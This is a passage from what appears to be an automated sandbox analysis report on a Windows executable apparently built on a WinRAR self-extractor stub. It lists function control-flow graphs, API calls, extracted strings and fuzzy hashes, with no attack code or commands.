7ff7ab4c0cfa-7ff7ab4c0d1d call 7ff7ab4ab8e0 DeleteObject 1569->1572 1571->1572 1576 7ff7ab4c0d1f DeleteObject 1572->1576 1577 7ff7ab4c0d25-7ff7ab4c0d2c 1572->1577 1576->1577 1578 7ff7ab4c0d48-7ff7ab4c0d59 1577->1578 1579 7ff7ab4c0d2e-7ff7ab4c0d35 1577->1579 1581 7ff7ab4c0d6d-7ff7ab4c0d7a 1578->1581 1582 7ff7ab4c0d5b-7ff7ab4c0d67 call 7ff7ab4bfe24 CloseHandle 1578->1582 1579->1578 1580 7ff7ab4c0d37-7ff7ab4c0d43 call 7ff7ab49ba0c 1579->1580 1580->1578 1585 7ff7ab4c0d9f-7ff7ab4c0da4 call 7ff7ab4b94e4 1581->1585 1586 7ff7ab4c0d7c-7ff7ab4c0d89 1581->1586 1582->1581 1591 7ff7ab4c0da9-7ff7ab4c0dd6 call 7ff7ab4c2320 1585->1591 1588 7ff7ab4c0d99-7ff7ab4c0d9b 1586->1588 1589 7ff7ab4c0d8b-7ff7ab4c0d93 1586->1589 1588->1585 1593 7ff7ab4c0d9d 1588->1593 1589->1585 1592 7ff7ab4c0d95-7ff7ab4c0d97 1589->1592 1592->1585 1593->1585
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                • API String ID: 1048086575-3710569615
                                                                                • Opcode ID: d5ff2d27d4a47c3e78c3dd13211a1c1de422b0d8b6c9155afaadc84a8e0932e8
                                                                                • Instruction ID: 3fa513fb462e2a6c13f4476274422283d914929ecece555d79def0e54cc43c90
                                                                                • Opcode Fuzzy Hash: d5ff2d27d4a47c3e78c3dd13211a1c1de422b0d8b6c9155afaadc84a8e0932e8
                                                                                • Instruction Fuzzy Hash: 0C126661A1AB8281EB10EB6CE8452B9E761FF85B44FC14235DA9D47BB6DF3CE140C720
                                                                                Function 00007FF7AB4AA4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                • String ID: $%s:$CAPTION
                                                                                • API String ID: 1936833115-404845831
                                                                                • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                • Instruction ID: f18281db7b6824ea551893460ccf7ea356310c40c34f707a9ccc4524bf5c8d45
                                                                                • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                • Instruction Fuzzy Hash: 4A91D832B1964186E714EF3DA440669E7A1FB88B84F855535EE4D47BB8DF3CE805CB10
                                                                                Function 00007FF7AB49F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: __tmp_reference_source_
                                                                                • API String ID: 3668304517-685763994
                                                                                • Opcode ID: 4624d0d2893f011b5be8b6ffca3faaddc15c8b957ce7a47abe3dcbca9120cf77
                                                                                • Instruction ID: 15b592bc9c0ecec2f8723c894d324e089032fb4cdd8fe0a4eea219f695fb652b
                                                                                • Opcode Fuzzy Hash: 4624d0d2893f011b5be8b6ffca3faaddc15c8b957ce7a47abe3dcbca9120cf77
                                                                                • Instruction Fuzzy Hash: 8EE2A262A0A6C296EA64EB39E4507BEE761FB81780F814136DB9D137B5CF3CE454C720
                                                                                Function 00007FF7AB494840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: CMT
                                                                                • API String ID: 3668304517-2756464174
                                                                                • Opcode ID: 3e3ef2645bc48f2f268b551dc6196b380c912f1c7b9d048ccb2ab2083d35e596
                                                                                • Instruction ID: 2cb3ba7b84680c70c42c0fb4f4d6b0c5c674403a2d46afbb1cb2bc7c758a83fb
                                                                                • Opcode Fuzzy Hash: 3e3ef2645bc48f2f268b551dc6196b380c912f1c7b9d048ccb2ab2083d35e596
                                                                                • Instruction Fuzzy Hash: 18E2F032B0A68286EB28EB79D4506FDA7A1FB45784F910035EA5E477B6DF3CE454C320
                                                                                Function 00007FF7AB4A40BC Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3498 7ff7ab4a40bc-7ff7ab4a40f3 3499 7ff7ab4a41d2-7ff7ab4a41df FindNextFileW 3498->3499 3500 7ff7ab4a40f9-7ff7ab4a4101 3498->3500 3503 7ff7ab4a41e1-7ff7ab4a41f1 GetLastError 3499->3503 3504 7ff7ab4a41f3-7ff7ab4a41f6 3499->3504 3501 7ff7ab4a4103 3500->3501 3502 7ff7ab4a4106-7ff7ab4a4118 FindFirstFileW 3500->3502 3501->3502 3502->3504 3505 7ff7ab4a411e-7ff7ab4a4146 call 7ff7ab4a6a0c 3502->3505 3506 7ff7ab4a41ca-7ff7ab4a41cd 3503->3506 3507 7ff7ab4a4211-7ff7ab4a4253 call 7ff7ab4c797c call 7ff7ab49129c call 7ff7ab4a8090 3504->3507 3508 7ff7ab4a41f8-7ff7ab4a4200 3504->3508 3518 7ff7ab4a4148-7ff7ab4a4164 FindFirstFileW 3505->3518 3519 7ff7ab4a4167-7ff7ab4a4170 3505->3519 3509 7ff7ab4a42eb-7ff7ab4a430e call 7ff7ab4c2320 3506->3509 3535 7ff7ab4a4255-7ff7ab4a426c 3507->3535 3536 7ff7ab4a428c-7ff7ab4a42e6 call 7ff7ab4af168 * 3 3507->3536 3511 7ff7ab4a4202 3508->3511 3512 7ff7ab4a4205-7ff7ab4a420c call 7ff7ab4920b0 3508->3512 3511->3512 3512->3507 3518->3519 3522 7ff7ab4a4172-7ff7ab4a4189 3519->3522 3523 7ff7ab4a41a9-7ff7ab4a41ad 3519->3523 3525 7ff7ab4a41a4 call 7ff7ab4c220c 3522->3525 3526 7ff7ab4a418b-7ff7ab4a419e 3522->3526 3523->3504 3527 7ff7ab4a41af-7ff7ab4a41be GetLastError 3523->3527 3525->3523 3526->3525 3529 7ff7ab4a4315-7ff7ab4a431b call 7ff7ab4c7904 3526->3529 3531 7ff7ab4a41c0-7ff7ab4a41c6 3527->3531 3532 7ff7ab4a41c8 3527->3532 3531->3506 3531->3532 3532->3506 3537 7ff7ab4a4287 call 7ff7ab4c220c 3535->3537 3538 7ff7ab4a426e-7ff7ab4a4281 3535->3538 3536->3509 3537->3536 3538->3537 3541 7ff7ab4a430f-7ff7ab4a4314 call 7ff7ab4c7904 3538->3541 3541->3529
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                • String ID:
                                                                                • API String ID: 474548282-0
                                                                                • Opcode ID: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
                                                                                • Instruction ID: f9e9ebafca51cdc6c7961245dec2d50d0ad6b386c36ac6b166f8d35b6bf43502
                                                                                • Opcode Fuzzy Hash: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
                                                                                • Instruction Fuzzy Hash: B461D572A0A64281EA10AF2DE84527DA761FB85BB4F914335EABD036F9DF3CD544C710
                                                                                Function 00007FF7AB495E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CMT
                                                                                • API String ID: 0-2756464174
                                                                                • Opcode ID: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
                                                                                • Instruction ID: 98af63e084f5c6a2338b1af572d9dcb5cc9b7f22780347c4010f1f279246f76a
                                                                                • Opcode Fuzzy Hash: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
                                                                                • Instruction Fuzzy Hash: 3E42D222B0A68196FB18EB78C1506FDB7A1FB51744F810136EB6E576B6DF38E518C310
                                                                                Function 00007FF7AB4ADFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 7ff7ab4adfd0-7ff7ab4ae024 call 7ff7ab4c2450 GetModuleHandleW 3 7ff7ab4ae026-7ff7ab4ae039 GetProcAddress 0->3 4 7ff7ab4ae07b-7ff7ab4ae3a5 0->4 5 7ff7ab4ae053-7ff7ab4ae066 GetProcAddress 3->5 6 7ff7ab4ae03b-7ff7ab4ae04a 3->6 7 7ff7ab4ae503-7ff7ab4ae521 call 7ff7ab4a6454 call 7ff7ab4a7df4 4->7 8 7ff7ab4ae3ab-7ff7ab4ae3b4 call 7ff7ab4cb788 4->8 5->4 10 7ff7ab4ae068-7ff7ab4ae078 5->10 6->5 20 7ff7ab4ae525-7ff7ab4ae52f call 7ff7ab4a51a4 7->20 8->7 16 7ff7ab4ae3ba-7ff7ab4ae3fd call 7ff7ab4a6454 CreateFileW 8->16 10->4 21 7ff7ab4ae4f0-7ff7ab4ae4fe CloseHandle call 7ff7ab491fa0 16->21 22 7ff7ab4ae403-7ff7ab4ae416 SetFilePointer 16->22 28 7ff7ab4ae531-7ff7ab4ae53c call 7ff7ab4add88 20->28 29 7ff7ab4ae564-7ff7ab4ae5ac call 7ff7ab4c797c call 7ff7ab49129c call 7ff7ab4a8090 call 7ff7ab491fa0 call 7ff7ab4a32bc 20->29 21->7 22->21 24 7ff7ab4ae41c-7ff7ab4ae43e ReadFile 22->24 24->21 27 7ff7ab4ae444-7ff7ab4ae452 24->27 31 7ff7ab4ae800-7ff7ab4ae807 call 7ff7ab4c2624 27->31 32 7ff7ab4ae458-7ff7ab4ae4ac call 7ff7ab4c797c call 7ff7ab49129c 27->32 28->29 41 7ff7ab4ae53e-7ff7ab4ae562 CompareStringW 28->41 69 7ff7ab4ae5b1-7ff7ab4ae5b4 29->69 49 7ff7ab4ae4c3-7ff7ab4ae4d9 call 7ff7ab4ad0a0 32->49 41->29 42 7ff7ab4ae5bd-7ff7ab4ae5c6 41->42 42->20 47 7ff7ab4ae5cc 42->47 50 7ff7ab4ae5d1-7ff7ab4ae5d4 47->50 64 7ff7ab4ae4ae-7ff7ab4ae4be call 7ff7ab4add88 49->64 65 7ff7ab4ae4db-7ff7ab4ae4eb call 7ff7ab491fa0 * 2 49->65 51 7ff7ab4ae63f-7ff7ab4ae642 50->51 52 7ff7ab4ae5d6-7ff7ab4ae5d9 50->52 55 7ff7ab4ae7c2-7ff7ab4ae7ff call 7ff7ab491fa0 * 2 call 7ff7ab4c2320 51->55 56 7ff7ab4ae648-7ff7ab4ae65b call 7ff7ab4a7eb0 call 7ff7ab4a51a4 51->56 57 7ff7ab4ae5dd-7ff7ab4ae62d call 7ff7ab4c797c call 7ff7ab49129c call 7ff7ab4a8090 call 7ff7ab491fa0 call 7ff7ab4a32bc 52->57 82 7ff7ab4ae661-7ff7ab4ae701 call 7ff7ab4add88 * 2 call 7ff7ab4aaae0 call 7ff7ab4ada98 call 7ff7ab4aaae0 call 7ff7ab4adc2c call 7ff7ab4b87ac call 7ff7ab4919e0 56->82 83 7ff7ab4ae706-7ff7ab4ae753 call 7ff7ab4ada98 AllocConsole 56->83 108 7ff7ab4ae62f-7ff7ab4ae638 57->108 109 7ff7ab4ae63c 57->109 64->49 65->21 76 7ff7ab4ae5b6 69->76 77 7ff7ab4ae5ce 69->77 76->42 77->50 100 7ff7ab4ae7b4-7ff7ab4ae7bb call 7ff7ab4919e0 ExitProcess 82->100 94 7ff7ab4ae7b0 83->94 95 7ff7ab4ae755-7ff7ab4ae7aa GetCurrentProcessId AttachConsole call 7ff7ab4ae868 call 7ff7ab4ae858 GetStdHandle WriteConsoleW Sleep FreeConsole 83->95 94->100 95->94 108->57 112 7ff7ab4ae63a 108->112 109->51 112->51
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                • API String ID: 1496594111-2013832382
                                                                                • Opcode ID: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                • Instruction ID: 7879610c5b2aff341a198f7b2b27bf57cf70b2fb6a3524d8ca8b45d08013bc5e
                                                                                • Opcode Fuzzy Hash: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                • Instruction Fuzzy Hash: 5E321A31A0BB8299EB51AF68E8401E9B3A4FF44354FD10236DA8D467B9EF3CD655C360
                                                                                Function 00007FF7AB4A98DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4A8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7AB4A8F8D
                                                                                • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7AB4A9F75
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4AA42F
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4AA435
                                                                                  • Part of subcall function 00007FF7AB4B0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7AB4B0B44), ref: 00007FF7AB4B0BE9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                • API String ID: 3629253777-3268106645
                                                                                • Opcode ID: 789f2c465d95f0b5fb7cec132a24dad3ff94c3f7f58e61963b873022c14ab567
                                                                                • Instruction ID: 8c14d0a5cb31f46ba8035a4d337bf08ac810c9b08719cbf057067571c89b4797
                                                                                • Opcode Fuzzy Hash: 789f2c465d95f0b5fb7cec132a24dad3ff94c3f7f58e61963b873022c14ab567
                                                                                • Instruction Fuzzy Hash: A362AE22A1AB8295EB10EF2CD4442BEA365FB44788FC2413ADA5D476F5EF3CE544C360
                                                                                Function 00007FF7AB4C1900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1906 7ff7ab4c1900-7ff7ab4c1989 call 7ff7ab4c1558 1909 7ff7ab4c19b4-7ff7ab4c19d1 1906->1909 1910 7ff7ab4c198b-7ff7ab4c19af call 7ff7ab4c1868 RaiseException 1906->1910 1912 7ff7ab4c19e6-7ff7ab4c19ea 1909->1912 1913 7ff7ab4c19d3-7ff7ab4c19e4 1909->1913 1916 7ff7ab4c1bb8-7ff7ab4c1bd5 1910->1916 1915 7ff7ab4c19ed-7ff7ab4c19f9 1912->1915 1913->1915 1917 7ff7ab4c1a1a-7ff7ab4c1a1d 1915->1917 1918 7ff7ab4c19fb-7ff7ab4c1a0d 1915->1918 1919 7ff7ab4c1ac4-7ff7ab4c1acb 1917->1919 1920 7ff7ab4c1a23-7ff7ab4c1a26 1917->1920 1930 7ff7ab4c1a13 1918->1930 1931 7ff7ab4c1b89-7ff7ab4c1b93 1918->1931 1922 7ff7ab4c1adf-7ff7ab4c1ae2 1919->1922 1923 7ff7ab4c1acd-7ff7ab4c1adc 1919->1923 1924 7ff7ab4c1a28-7ff7ab4c1a3b 1920->1924 1925 7ff7ab4c1a3d-7ff7ab4c1a52 LoadLibraryExA 1920->1925 1926 7ff7ab4c1b85 1922->1926 1927 7ff7ab4c1ae8-7ff7ab4c1aec 1922->1927 1923->1922 1924->1925 1929 7ff7ab4c1aa9-7ff7ab4c1ab2 1924->1929 1928 7ff7ab4c1a54-7ff7ab4c1a67 GetLastError 1925->1928 1925->1929 1926->1931 1933 7ff7ab4c1aee-7ff7ab4c1af2 1927->1933 1934 7ff7ab4c1b1b-7ff7ab4c1b2e GetProcAddress 1927->1934 1935 7ff7ab4c1a69-7ff7ab4c1a7c 1928->1935 1936 7ff7ab4c1a7e-7ff7ab4c1aa4 call 7ff7ab4c1868 RaiseException 1928->1936 1939 7ff7ab4c1ab4-7ff7ab4c1ab7 FreeLibrary 1929->1939 1940 7ff7ab4c1abd 1929->1940 1930->1917 1937 7ff7ab4c1bb0 call 7ff7ab4c1868 1931->1937 1938 7ff7ab4c1b95-7ff7ab4c1ba6 1931->1938 1933->1934 1942 7ff7ab4c1af4-7ff7ab4c1aff 1933->1942 1934->1926 1945 7ff7ab4c1b30-7ff7ab4c1b43 GetLastError 1934->1945 1935->1929 1935->1936 1936->1916 1948 7ff7ab4c1bb5 1937->1948 1938->1937 1939->1940 1940->1919 1942->1934 1946 7ff7ab4c1b01-7ff7ab4c1b08 1942->1946 1950 7ff7ab4c1b45-7ff7ab4c1b58 1945->1950 1951 7ff7ab4c1b5a-7ff7ab4c1b81 call 7ff7ab4c1868 RaiseException call 7ff7ab4c1558 1945->1951 1946->1934 1952 7ff7ab4c1b0a-7ff7ab4c1b0f 1946->1952 1948->1916 1950->1926 1950->1951 1951->1926 1952->1934 1954 7ff7ab4c1b11-7ff7ab4c1b19 1952->1954 1954->1926 1954->1934
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                • String ID: H
                                                                                • API String ID: 3432403771-2852464175
                                                                                • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                • Instruction ID: 4307360f4bfbc7aec75a2fc4b8ad21933edaf06b52d15c34199e32f7685a6082
                                                                                • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                • Instruction Fuzzy Hash: 48913C32A06B518AEB50EF69D8406BCB3B1BB09B98F864535DE0D17774EF38E845D720
                                                                                Function 00007FF7AB4BF4E0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 285windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
